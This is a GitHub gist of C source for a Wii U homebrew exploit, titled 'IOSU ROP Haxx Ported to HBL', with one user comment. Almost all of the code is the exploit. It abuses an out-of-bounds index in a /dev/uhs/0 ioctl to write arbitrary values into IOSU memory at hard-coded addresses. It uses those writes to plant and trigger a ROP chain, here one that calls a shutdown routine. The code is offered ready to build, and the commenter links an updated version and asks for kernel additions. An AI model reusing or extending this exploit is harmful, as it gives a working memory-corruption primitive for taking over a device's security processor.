Skip to content

Instantly share code, notes, and snippets.

@CreeperMario

CreeperMario/main.c

Created October 9, 2016 20:34
Show Gist options
  • Save CreeperMario/c9b4ba6b0e92ccea866f50c83270e5e5 to your computer and use it in GitHub Desktop.
Save CreeperMario/c9b4ba6b0e92ccea866f50c83270e5e5 to your computer and use it in GitHub Desktop.
Download ZIP
IOSU ROP Haxx Ported to HBL - to use this download https://github.com/dimok789/hello_world and replace the main.c and main.h files with the ones here
Raw
main.c
#include <string.h>
#include <stdarg.h>
#include <stdlib.h>
#include <malloc.h>
#include <unistd.h>
#include "dynamic_libs/os_functions.h"
#include "dynamic_libs/fs_functions.h"
#include "dynamic_libs/gx2_functions.h"
#include "dynamic_libs/sys_functions.h"
#include "dynamic_libs/vpad_functions.h"
#include "dynamic_libs/padscore_functions.h"
#include "dynamic_libs/socket_functions.h"
#include "dynamic_libs/ax_functions.h"
#include "fs/fs_utils.h"
#include "fs/sd_fat_devoptab.h"
#include "system/memory.h"
#include "system/exception_handler.h"
#include "utils/logger.h"
#include "utils/utils.h"
#include "common/common.h"
#include "main.h"
/* Entry point */
int Menu_Main(void)
{
InitOSFunctionPointers();
int(*IOS_Open)(char *path, unsigned int mode);
OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Open", &IOS_Open);
int(*IOS_Close)(int fd);
OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Close", &IOS_Close);
int du0h = IOS_Open("/dev/uhs/0", 0);
#define CHAIN_START 0x1016AD40
#define SHUTDOWN 0x1012EE4C
#define SIMPLE_RETURN 0x101014E4
int ret;
ret = write32(du0h, CHAIN_START + 0x4, SIMPLE_RETURN);
ret = write32(du0h, CHAIN_START + 0x8, SHUTDOWN);
// the following line will trigger the ROP chain
ret = write32(du0h, CHAIN_START, SIMPLE_RETURN);
IOS_Close(du0h);
return EXIT_SUCCESS;
}
int write32(int dev_uhs_0_handle, int arm_addr, int val) {
int(*IOS_Ioctl)(int fd, unsigned int request, void *input_buffer,
unsigned int input_buffer_len, void *output_buffer, unsigned int output_buffer_len);
void(*DCInvalidateRange)(void *addr, unsigned int len);
OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Ioctl", &IOS_Ioctl);
OSDynLoad_FindExport(coreinit_handle, 0, "DCInvalidateRange", &DCInvalidateRange);
int* pretend_root_hub = (int*)0xF5003ABC;
int *ayylmao = (int*)0xF4500000;
ayylmao[8] = (int)ayylmao - 0xF4000000;
ayylmao[5] = 1;
ayylmao[520] = arm_addr - 24; // the address to be overwritten, minus 24 bytes.
pretend_root_hub[33] = (int)ayylmao - 0xF4000000;
pretend_root_hub[78] = 0;
DCFlushRange(pretend_root_hub + 33, 200);
DCInvalidateRange(pretend_root_hub + 33, 200);
DCFlushRange(ayylmao, 521 * 4);
DCInvalidateRange(ayylmao, 521 * 4);
OSSleepTicks(0x200000);
int root_hub_index = -(0xBEA2C); // gets IOS_USB to read from the middle of MEM1
int request_buffer[] = { root_hub_index, val };
int output_buffer[32];
int ret = IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));
return ret;
}
Raw
main.h
#ifndef _MAIN_H_
#define _MAIN_H_
#include "common/types.h"
#include "dynamic_libs/os_functions.h"
/* Main */
#ifdef __cplusplus
extern "C" {
#endif
//! C wrapper for our C++ functions
int Menu_Main(void);
int write32(int, int, int);
#ifdef __cplusplus
}
#endif
#endif
@mariogamer2
Copy link

mariogamer2 commented Oct 14, 2016
edited
Loading

There is an updated version here: https://gbatemp.net/attachments/ios-usb_rop-zip.65893/

Also,would you add the kernel things?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment